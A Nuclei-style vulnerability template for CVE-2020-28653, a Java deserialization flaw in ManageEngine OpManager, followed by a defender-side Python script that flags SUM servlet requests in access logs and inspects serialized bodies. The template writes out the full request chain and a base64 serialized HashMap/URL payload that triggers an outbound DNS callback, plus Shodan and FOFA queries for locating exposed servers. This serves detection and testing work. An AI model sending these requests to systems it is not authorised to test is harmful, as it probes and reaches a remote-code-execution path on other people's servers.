Vulnerability description
Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
id: CVE-2020-28653

info:
  name: ManageEngine OpManager SumPDU 12.1 - 12.5.232 - Java Deserialization
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to build 125203 or later.
  reference:
    - http://packetstormsecurity.com/files/164231/ManageEngine-OpManager-SumPDU-Java-Deserialization.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28653
    epss-score: 0.90182
    epss-percentile: 0.99558
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  metadata:
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query:
      - http.title:"opmanager plus"
      - http.title:"opmanager"
    fofa-query:
      - title="opmanager plus"
      - title="opmanager"
    google-query:
      - intitle:"opmanager plus"
      - intitle:"opmanager"
  tags: cve,cve2020,packetstorm,java,deserialization,rce,opmanager,intrusive,vuln,vkev

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',50,'prefix')}}"

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(body, "ManageEngine")'
        condition: and
        internal: true

  - raw:
      - |
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  - raw:
      - |
        POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{base64_decode('rO0ABXcEAAAD6g==')}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  - raw:
      - |
        POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{replace(base64_decode('AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA=='),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', payload)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
# digest: 4a0a0047304502200a9583338614f1b0fcb70a9f8dd366657ed1345337304d7d2d7041a16d728e2b022100e7aff127931f97fd37b3b04b68de5d32d66fc5c9cce59cdc24b49717beeca349:922c64590222798bb761d5b6d8e72950
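The template above describes the traffic a scanner sends: a handshake to SUMHandShakeServlet and then a length-prefixed Java serialization stream (a java.util.HashMap holding a java.net.URL) to SUMCommunicationServlet, confirmed by a DNS callback. The following is an added defender-side example, not part of the template or the Nuclei project: it flags requests to the SUM servlet paths in combined-format access-log lines, spots clients whose request order mirrors the template's flow, and inspects a captured POST body for the Java serialization magic and the class names it carries. The log lines are constructed samples; the two body samples are the template's own base64 values in their placeholder form (fifty `a` characters where the template substitutes its interactsh domain).

```python
"""Triage helpers for OpManager SUM servlet traffic (CVE-2020-28653).

scan_access_log()    - findings for every log line that hits a SUM servlet
suspicious_clients() - clients that POST to the handshake servlet and then
                       to the communication servlet, as the template does
inspect_body()       - is a POST body a Java serialization stream, is it
                       behind the 4-byte length prefix the SUM protocol
                       uses, and which classes does it name
"""
import base64
import re
from dataclasses import dataclass, field

# Servlet path prefix from the template.
SUM_SERVLET_PREFIX = "/servlets/com.adventnet.tools.sum.transport."

# java.io.ObjectOutputStream stream magic followed by protocol version 5.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Constructed combined-format log lines: one client replays the template's
# four-request flow, another just browses a page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1" 200 0',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "POST /servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet HTTP/1.1" 200 0',
    '203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "POST /servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet HTTP/1.1" 200 0',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 9876',
]

# The template's handshake body and its placeholder payload body.
HANDSHAKE = base64.b64decode("rO0ABXcEAAAD6g==")
TEMPLATE_PAYLOAD = base64.b64decode(
    "AAABX6ztAAVzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAMdwgAAAAQAAAAAXNyAAxqYXZhLm5ldC5VUkyWJTc2GvzkcgMAB0kACGhhc2hDb2RlSQAEcG9ydEwACWF1dGhvcml0eXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABGZpbGVxAH4AA0wABGhvc3RxAH4AA0wACHByb3RvY29scQB+AANMAANyZWZxAH4AA3hw//////////90ADJhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYXQAAHEAfgAFdAAEaHR0cHB4dAA5aHR0cDovL2FhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheA=="
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)
# Java class names as written into a class descriptor (ASCII only here).
NAME_RE = re.compile(rb"[A-Za-z_$][\w$.]*")


@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    path: str
    status: int


def scan_access_log(lines):
    """Return a Finding for every parseable line that touches a SUM servlet."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["path"].startswith(SUM_SERVLET_PREFIX):
            findings.append(Finding(m["ip"], m["ts"], m["method"], m["path"], int(m["status"])))
    return findings


def suspicious_clients(findings):
    """Clients whose SUM requests follow the template's order: a POST to the
    handshake servlet and, later, a POST to the communication servlet."""
    seen_handshake, flagged = set(), []
    for f in findings:
        if f.method != "POST":
            continue
        if f.path.endswith("SUMHandShakeServlet"):
            seen_handshake.add(f.ip)
        elif f.path.endswith("SUMCommunicationServlet") and f.ip in seen_handshake and f.ip not in flagged:
            flagged.append(f.ip)
    return flagged


@dataclass
class BodyReport:
    is_java_stream: bool
    length_prefixed: bool
    classes: list = field(default_factory=list)


def _class_names(stream):
    """Names from TC_OBJECT + TC_CLASSDESC records (0x73 0x72, a 2-byte
    big-endian length, then the class name)."""
    names = []
    for m in re.finditer(rb"\x73\x72", stream):
        start = m.end()
        n = int.from_bytes(stream[start:start + 2], "big")
        raw = stream[start + 2:start + 2 + n]
        if n and len(raw) == n and NAME_RE.fullmatch(raw):
            names.append(raw.decode("ascii"))
    return names


def inspect_body(body):
    """Detect a Java serialization stream at offset 0 or after a 4-byte
    big-endian length prefix whose value equals the remaining length."""
    prefixed = len(body) >= 8 and int.from_bytes(body[:4], "big") == len(body) - 4
    stream = body[4:] if prefixed else body
    if not stream.startswith(JAVA_SERIAL_MAGIC):
        return BodyReport(False, prefixed)
    return BodyReport(True, prefixed, _class_names(stream))


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f.ts} {f.ip} {f.method} {f.path} -> {f.status}")
    print("clients replaying handshake+communication:", suspicious_clients(hits))
    print("handshake body:", inspect_body(HANDSHAKE))
    print("payload body:", inspect_body(TEMPLATE_PAYLOAD))
```

Run on a real web-server log, the first two functions give an analyst a short list of clients worth examining; `inspect_body` needs the request body, so it belongs on a proxy, WAF or packet capture rather than on access logs alone. A `java.net.URL` inside a `java.util.HashMap` is the reason the template's last matcher waits for a DNS interaction: resolving the URL's host is the side effect that proves the stream was deserialized.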